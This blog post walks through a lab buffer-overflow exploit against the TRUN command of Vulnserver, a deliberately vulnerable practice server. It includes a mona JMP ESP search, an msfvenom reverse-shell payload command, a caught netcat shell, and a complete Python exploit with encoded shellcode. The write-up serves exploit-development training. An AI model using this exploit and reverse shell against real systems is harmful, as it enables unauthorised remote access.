Vulnserver TRUN – This Time, We Go Vanilla (EIP)

This post will be a little shorter, but I wanted to finish up my vulnserver TRUN exploit paths.

Vulnserver TRUN - Introduction

If you haven't read my previous write-up on the "TRUN" command, then I suggest you start with that one.

This exploit will pick up somewhere in the middle of the last one, with a different exploit path.

In this case, I will go with the standard vanilla EIP overwrite with a JMP ESP. For another example, you can visit the following write-up.

Finding the Jump

First, I started by taking a look at the modules again.

Vulnserver TRUN - Modules

In this case, I decided to use the essfunc.dll, as I would not need to worry about null bytes.

Next, I used mona to search for a JMP ESP in the library.

!mona find -s "\xff\xe4" -m essfunc.dll    (ff e4 = JMP ESP)

Vulnserver TRUN - JMP ESP

Verifying the Jump

I selected one of the instructions randomly (0x625011af), and updated my payload.

buffer += "\x90" * 2001
# 0x625011af = JMP ESP
buffer += "\xaf\x11\x50\x62"
buffer += "\xcc" * (5000 - len(buffer))

As you can see, the breakpoint was hit as expected.

Vulnserver TRUN - Breakpoint

Additionally, the stack has my interrupts, so the exploit can now be finished!

Vulnserver TRUN - Stack

Reverse Shell

With my skeleton in place, I generated some reverse shellcode to connect back to me.

root@kali:~/vulnserver# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -b "\x00" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1684 bytes

Once I added the new shellcode to my exploit, I resent the full payload.

root@kali:~/vulnserver# python trun_eip_reverse.py
Welcome to Vulnerable Server! Enter HELP for help.

[+] Sending exploit...

As you can see, I was able to catch the reverse shell and complete the exploit!

root@kali:~/vulnserver# nc -lvp 4444
listening on [any] 4444 ...
192.168.0.2: inverse host lookup failed: Unknown host
connect to [192.168.0.1] from (UNKNOWN) [192.168.0.2] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Downloads\vulnserver-master> whoami
whoami
ie8win7\ieuser

C:\Users\IEUser\Downloads\vulnserver-master>

Vulnserver TRUN - Reverse Shell

Additionally, the server was not crashing at all, as seen in the following screenshot.

Vulnserver TRUN - Server

Final Code

Here is the final exploit that I used for my reverse shell.

#!/usr/bin/python

import socket
import os
import sys

host = "192.168.0.2"
port = 9999

buf =  ""
buf += "\xbe\x97\x7c\x63\x8e\xdb\xc8\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x52\x31\x77\x12\x83\xef\xfc\x03\xe0\x72\x81"
buf += "\x7b\xf2\x63\xc7\x84\x0a\x74\xa8\x0d\xef\x45\xe8\x6a"
buf += "\x64\xf5\xd8\xf9\x28\xfa\x93\xac\xd8\x89\xd6\x78\xef"
buf += "\x3a\x5c\x5f\xde\xbb\xcd\xa3\x41\x38\x0c\xf0\xa1\x01"
buf += "\xdf\x05\xa0\x46\x02\xe7\xf0\x1f\x48\x5a\xe4\x14\x04"
buf += "\x67\x8f\x67\x88\xef\x6c\x3f\xab\xde\x23\x4b\xf2\xc0"
buf += "\xc2\x98\x8e\x48\xdc\xfd\xab\x03\x57\x35\x47\x92\xb1"
buf += "\x07\xa8\x39\xfc\xa7\x5b\x43\x39\x0f\x84\x36\x33\x73"
buf += "\x39\x41\x80\x09\xe5\xc4\x12\xa9\x6e\x7e\xfe\x4b\xa2"
buf += "\x19\x75\x47\x0f\x6d\xd1\x44\x8e\xa2\x6a\x70\x1b\x45"
buf += "\xbc\xf0\x5f\x62\x18\x58\x3b\x0b\x39\x04\xea\x34\x59"
buf += "\xe7\x53\x91\x12\x0a\x87\xa8\x79\x43\x64\x81\x81\x93"
buf += "\xe2\x92\xf2\xa1\xad\x08\x9c\x89\x26\x97\x5b\xed\x1c"
buf += "\x6f\xf3\x10\x9f\x90\xda\xd6\xcb\xc0\x74\xfe\x73\x8b"
buf += "\x84\xff\xa1\x1c\xd4\xaf\x19\xdd\x84\x0f\xca\xb5\xce"
buf += "\x9f\x35\xa5\xf1\x75\x5e\x4c\x08\x1e\xa1\x39\x12\xdf"
buf += "\x49\x38\x12\xce\xd5\xb5\xf4\x9a\xf5\x93\xaf\x32\x6f"
buf += "\xbe\x3b\xa2\x70\x14\x46\xe4\xfb\x9b\xb7\xab\x0b\xd1"
buf += "\xab\x5c\xfc\xac\x91\xcb\x03\x1b\xbd\x90\x96\xc0\x3d"
buf += "\xde\x8a\x5e\x6a\xb7\x7d\x97\xfe\x25\x27\x01\x1c\xb4"
buf += "\xb1\x6a\xa4\x63\x02\x74\x25\xe1\x3e\x52\x35\x3f\xbe"
buf += "\xde\x61\xef\xe9\x88\xdf\x49\x40\x7b\x89\x03\x3f\xd5"
buf += "\x5d\xd5\x73\xe6\x1b\xda\x59\x90\xc3\x6b\x34\xe5\xfc"
buf += "\x44\xd0\xe1\x85\xb8\x40\x0d\x5c\x79\x70\x44\xfc\x28"
buf += "\x19\x01\x95\x68\x44\xb2\x40\xae\x71\x31\x60\x4f\x86"
buf += "\x29\x01\x4a\xc2\xed\xfa\x26\x5b\x98\xfc\x95\x5c\x89"

buffer = "\x90" * 2001
# 0x625011af = JMP ESP
buffer += "\xaf\x11\x50\x62"
buffer += "\x90" * 16
buffer += buf
buffer += "\x90" * (5000 - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

print s.recv(1024)

print "[+] Sending exploit..."

s.send("TRUN  /.../" + buffer)

print s.recv(1024)

s.close()

Vulnserver TRUN - Conclusion

This finishes up the TRUN command, although this exploit was obviously easier than the last one.

I'm hoping to finish up the rest of the commands soon, but that might have to wait for some other posts.

You can find the final exploit in my GitHub repository, but let me know if you think there is anything that I should add.

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.